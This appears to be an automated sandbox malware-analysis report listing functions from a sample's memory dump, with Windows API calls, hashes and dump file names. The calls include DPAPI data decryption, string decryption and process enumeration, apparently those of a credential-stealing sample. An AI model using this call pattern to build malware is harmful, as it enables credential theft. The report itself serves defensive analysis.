                                      Similarity
                                      • API ID:
                                      • String ID: *]=$0D$7V_$:Vn_$a9m$s K_
                                      • API String ID: 0-3737603074
                                      • Opcode ID: 042a7c7aa71af4829ab7bd8427d3e157a28d5b1ecc0fe48dae4d9ffe0ec6c9f1
                                      • Instruction ID: d67db668bb9ead3de8992f0bac3e99ef4178c45962f3360c52773242e467b553
                                      • Opcode Fuzzy Hash: 042a7c7aa71af4829ab7bd8427d3e157a28d5b1ecc0fe48dae4d9ffe0ec6c9f1
                                      • Instruction Fuzzy Hash: 4BB208F36082049FE304AE2DEC8567AFBE9EF94720F16853DE6C4C7740EA7598058697
                                      Function 00B2F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: 4ebff770ca9003b3ff78ffcf074ef1eb3c9ecf9f53eebc7f9fba8d07c7035ec9
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: A5415D12E19BDAC5CB058B7444A02BEBFB26FD6210F6D43EAC49D1F782C774814AD3A5
                                      Function 00ACC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ACC971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ACC97C
                                      • lstrcat.KERNEL32(?,00AE0B47), ref: 00ACCA43
                                      • lstrcat.KERNEL32(?,00AE0B4B), ref: 00ACCA57
                                      • lstrcat.KERNEL32(?,00AE0B4E), ref: 00ACCA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: a306c9f8689dc6fb35c84516cb66d5c639463608de1c656ae7ec40eeea9a6e09
                                      • Instruction ID: 50c184ce4d8d8d2d06f348a36d5f8d59c57aceb86bf039f1b1846d971c96f786
                                      • Opcode Fuzzy Hash: a306c9f8689dc6fb35c84516cb66d5c639463608de1c656ae7ec40eeea9a6e09
                                      • Instruction Fuzzy Hash: EF4167B491431EEBDB10CFA4DD89FEEB7B8BB48344F1045A9E509A7280D7705A84CFA5
                                      Function 00AD6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00AD6C0C
                                      • sscanf.NTDLL ref: 00AD6C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AD6C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AD6C60
                                      • ExitProcess.KERNEL32 ref: 00AD6C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 86181f649e8c06dd9dff64e9e67156a0109d81f15086d227ce827007f3fca576
                                      • Instruction ID: 20d2792278b2526ba2b4dc8f78abd516d70eb2bfb014a144a5feb4e15f761914
                                      • Opcode Fuzzy Hash: 86181f649e8c06dd9dff64e9e67156a0109d81f15086d227ce827007f3fca576
                                      • Instruction Fuzzy Hash: 1721AD75D14209ABCF48DFE4E9459EEB7B9FF48300F04856AF516E3250EB349604CB69
                                      Function 00AC72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00AC72AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC72B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00AC72E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00AC7304
                                      • LocalFree.KERNEL32(?), ref: 00AC730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 0b51ac7388f1711fb7ff6456b16afc7c823a423f7044eed68f974fb8ee6d59d2
                                      • Instruction ID: 67877c3a492950d59e6cf69ad36b9eb053bb2668ac78d29ae5061843c5968147
                                      • Opcode Fuzzy Hash: 0b51ac7388f1711fb7ff6456b16afc7c823a423f7044eed68f974fb8ee6d59d2
                                      • Instruction Fuzzy Hash: F2010C75A54308BBDB10DFA4DC46F9E7778AB44B00F104549FB05EA3C0D6B0AA409B68
                                      Function 00AD9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD97AE
                                      • Process32First.KERNEL32(00AE0ACE,00000128), ref: 00AD97C2
                                      • Process32Next.KERNEL32(00AE0ACE,00000128), ref: 00AD97D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00AD97EC
                                      • CloseHandle.KERNEL32(00AE0ACE), ref: 00AD980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 05bef2c4696d11c8b11423a20bb5945af9c1001297d5415510ade3afc958077f
                                      • Instruction ID: ef40a41445cb0a19aa73c10a229337823b76b59e21653c0ac074c8e1b707e07f
                                      • Opcode Fuzzy Hash: 05bef2c4696d11c8b11423a20bb5945af9c1001297d5415510ade3afc958077f
                                      • Instruction Fuzzy Hash: 12010C75A24308ABDB20DFA5CD44BDEB7B8BB49700F10458AE50AE6340D730DA40DF60
                                      Function 00AE4573 Relevance: 7.3, Strings: 2, Instructions: 4816COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: 6a2fedf1c1bf9c089bc0f0beeff17475c0faabf16cfb0d707f554e65a8d74d49
                                      • Instruction ID: a53067729c79838696e828b65188dd4bb9ac62a2f626536dd73980df7a4aa215
                                      • Opcode Fuzzy Hash: 6a2fedf1c1bf9c089bc0f0beeff17475c0faabf16cfb0d707f554e65a8d74d49
                                      • Instruction Fuzzy Hash: AE63633281EBD41ECB27DB3297B61917F6ABE1361431D4ACEC4C18F4B3C6909A16E356
                                      Function 00F165BC Relevance: 7.0, Strings: 5, Instructions: 785COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: +KgO${Fg$~|/;$CCP$?r
                                      • API String ID: 0-2126239977
                                      • Opcode ID: 6b759815dfcf0dc310af869d7767d5be4f0da62cfb7a7f43f180d57b2cc23af3
                                      • Instruction ID: 0d96cd57f12552641d241325520bb38b8c7aa296cd54e6bfb457ce4b36e8dafd
                                      • Opcode Fuzzy Hash: 6b759815dfcf0dc310af869d7767d5be4f0da62cfb7a7f43f180d57b2cc23af3
                                      • Instruction Fuzzy Hash: 75322CF360C2009FE304AE2DED8567ABBE5EBD4720F1A863DEAC5C3744E63558058697
                                      Function 00F0B8A7 Relevance: 6.7, Strings: 4, Instructions: 1677COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <M_]$GES$WMg_$d
                                      • API String ID: 0-410754082
                                      • Opcode ID: 9324a61b4e718ce7c7935bb94e3e19426b70193eb2b1c884ad0c200127d03017
                                      • Instruction ID: 96163eac2e64ccfacccdf6f84b9b595bda486215e88a22667c69e03a57756639
                                      • Opcode Fuzzy Hash: 9324a61b4e718ce7c7935bb94e3e19426b70193eb2b1c884ad0c200127d03017
                                      • Instruction Fuzzy Hash: 73B2F7F3A0C204AFE7046E29EC4567AF7E9EFD4720F1A853DEAC4D3344EA3558058696
                                      Function 00AD9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00AC51D4,40000001,00000000,00000000,?,00AC51D4), ref: 00AD9050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: bbd47793cc2b59d746608e83f3c26bfc2f285fee0f64e12525760ada90cbaeff
                                      • Instruction ID: b551af1448c344f8a4e691cdb8f1992cb28af5f157b057053bbc2650bd7dc959
                                      • Opcode Fuzzy Hash: bbd47793cc2b59d746608e83f3c26bfc2f285fee0f64e12525760ada90cbaeff
                                      • Instruction Fuzzy Hash: 3011F570214208EFDB00DF54E888BAB33B9AF89354F10854AFA1A8B350D776E941CBA4
                                      Function 00ACA210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00AC4F3E,00000000,?), ref: 00ACA251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA27A
                                      • LocalFree.KERNEL32(?,?,?,?,00AC4F3E,00000000,?), ref: 00ACA28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 0ffb6ced079a7cd99ef19770d0549823ddc5138382c5734426b2d152c464c4c9
                                      • Instruction ID: 0e23328e0be2eede069805c4d72695432458bd5ba0742fb4d4d6855d5d2ea37a
                                      • Opcode Fuzzy Hash: 0ffb6ced079a7cd99ef19770d0549823ddc5138382c5734426b2d152c464c4c9
                                      • Instruction Fuzzy Hash: 7B11D274240308AFEB10CFA4CC95FAA77B5EB89B04F208049FD199B390C7B2A941CB64
                                      Function 00AD7BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0154F020,00000000,?,00AE0DF8,00000000,?,00000000,00000000), ref: 00AD7BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0154F020,00000000,?,00AE0DF8,00000000,?,00000000,00000000,?), ref: 00AD7C0D
